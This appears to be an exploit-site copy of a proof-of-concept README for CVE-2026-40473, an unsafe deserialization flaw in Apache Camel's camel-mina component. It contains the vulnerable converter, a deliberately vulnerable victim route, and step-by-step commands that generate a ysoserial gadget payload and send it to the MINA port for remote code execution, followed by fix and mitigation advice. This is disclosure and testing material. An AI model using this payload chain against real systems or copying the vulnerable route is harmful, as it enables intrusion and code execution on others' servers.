Share
## https://sploitus.com/exploit?id=7E0FD4D1-DF5F-5D83-AFA2-3FC9549BE69E
# camel-mina MinaConverter.toObjectInput Unsafe Deserialization Reproducer (CVE-2026-40473)

This project demonstrates a **Java deserialization vulnerability** in Apache Camel's `camel-mina`
component, tracked as **CVE-2026-40473**. The `MinaConverter.toObjectInput(IoBuffer)` type converter
wraps the received bytes in a raw `ObjectInputStream` with no `ObjectInputFilter`, so a route that
converts a TCP/UDP body to `ObjectInput` and calls `readObject()` can be driven to **remote code
execution** by an attacker sending a crafted serialized object to the MINA port.

Advisory: https://camel.apache.org/security/CVE-2026-40473.html

## Vulnerability Summary

| Property | Value |
|----------|-------|
| **Component** | `camel-mina` |
| **Affected Class** | `org.apache.camel.component.mina.MinaConverter` (`toObjectInput`) |
| **CWE** | CWE-502: Deserialization of Untrusted Data |
| **Impact** | Remote Code Execution (RCE) over TCP/UDP |
| **Affected Versions** | From 3.0.0 before 4.14.6, from 4.15.0 before 4.18.2, from 4.19.0 before 4.20.0 |
| **Fixed Versions** | 4.14.6, 4.18.2, 4.20.0 |
| **JIRA** | CAMEL-23319 |
| **Reporter** | Venkatraman Kumar (Securin) |

## Technical Details

The `IoBuffer โ†’ ObjectInput` type converter wraps the buffer in a raw `ObjectInputStream`:

```java
// MinaConverter.toObjectInput(IoBuffer) - affected version
@Converter
public static ObjectInput toObjectInput(IoBuffer buffer) throws IOException {
    InputStream is = buffer.asInputStream();
    return new ObjectInputStream(is);   // NO ObjectInputFilter
}
```

When a camel-mina TCP/UDP consumer delivers the raw bytes (e.g. with `allowDefaultCodec=false`) and the
route asks for `ObjectInput` (`getBody(ObjectInput.class)`, `@Body ObjectInput`, or
`convertBodyTo(ObjectInput.class)`), this converter runs. Calling `readObject()` on the returned stream
then executes any gadget chain in the attacker-supplied bytes.

## The victim route

```java
from("mina:tcp://0.0.0.0:5555?sync=false&allowDefaultCodec=false")
    .process(exchange -> {
        ObjectInput oi = exchange.getIn().getBody(ObjectInput.class);  // MinaConverter.toObjectInput
        Object obj = oi.readObject();                                  // deserialization sink
        exchange.getMessage().setBody("deserialized: " + obj);
    });
```

## Prerequisites

- Java 17+ and Maven 3.8+ (to build the jar)
- Docker (runs the reproducer)
- ysoserial (for payload generation)

## Reproduction Steps

### Step 1: Build the jar and start the container

```bash
mvn clean package -DskipTests
docker compose up -d --build
```

### Step 2: Generate a malicious payload

```bash
wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

# On JDK 21 add --add-opens to generate CommonsCollections gadgets:
java --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED \
     --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
     -jar ysoserial-all.jar CommonsCollections7 "touch /tmp/pwned" | base64 -w0 > payload.b64
```

### Step 3: Send it over TCP to the MINA port (RCE)

```bash
curl -X POST http://localhost:8080/exploit/inject \
  -H "Content-Type: text/plain" --data-binary @payload.b64
# The bundled helper opens a raw TCP socket to mina:5555 and writes the bytes; the victim route
# converts them to ObjectInput and calls readObject().
# -> ">>> RCE proof โ€” /tmp/pwned exists: true"
```

(The MINA port 5555 is internal to the container in this PoC; the `/exploit/inject` helper performs the
raw TCP send from inside. Expose port 5555 to send from the host with a raw client such as `nc`.)

### Step 4: Verify

```bash
docker exec cve-2026-40473 ls -la /tmp/pwned
```

### Cleanup

```bash
docker compose down
```

## Attack Vectors

Any camel-mina TCP or UDP consumer whose route converts the body to `ObjectInput` (directly, via
`@Body ObjectInput`, or `convertBodyTo(ObjectInput.class)`) is exploitable by anyone who can reach the
MINA port.

## Exploit Conditions

1. A camel-mina TCP/UDP consumer that requests `ObjectInput` conversion of the received bytes.
2. **A gadget library on the classpath** (e.g. `commons-collections:3.2.1`).

## Recommended Fix

Upgrade to 4.14.6 / 4.18.2 / 4.20.0. The fix applies an `ObjectInputFilter` / class allow-list to the
converter (matching the hardening applied to camel-netty, camel-jms and camel-infinispan).

## Mitigation

Until upgrading:

1. **Do not convert untrusted MINA bodies to `ObjectInput`** / do not deserialize them.
2. **Remove gadget libraries** (upgrade/remove commons-collections 3.x).
3. Restrict network access to the MINA port to trusted peers.

## Files

```
CVE-2026-40473/
โ”œโ”€โ”€ pom.xml
โ”œโ”€โ”€ Dockerfile
โ”œโ”€โ”€ docker-compose.yml
โ”œโ”€โ”€ README.md
โ””โ”€โ”€ src/main/
    โ”œโ”€โ”€ java/com/example/
    โ”‚   โ”œโ”€โ”€ Application.java
    โ”‚   โ”œโ”€โ”€ MinaObjectRoute.java      # victim: from(mina:tcp).getBody(ObjectInput).readObject()
    โ”‚   โ””โ”€โ”€ ExploitController.java    # /inject: sends serialized bytes over TCP to mina:5555
    โ””โ”€โ”€ resources/
        โ””โ”€โ”€ application.properties
```

## Disclaimer

This reproducer is provided for **security research and authorized testing only**, for a **publicly
disclosed and fixed** vulnerability. Do not use it against systems without explicit permission.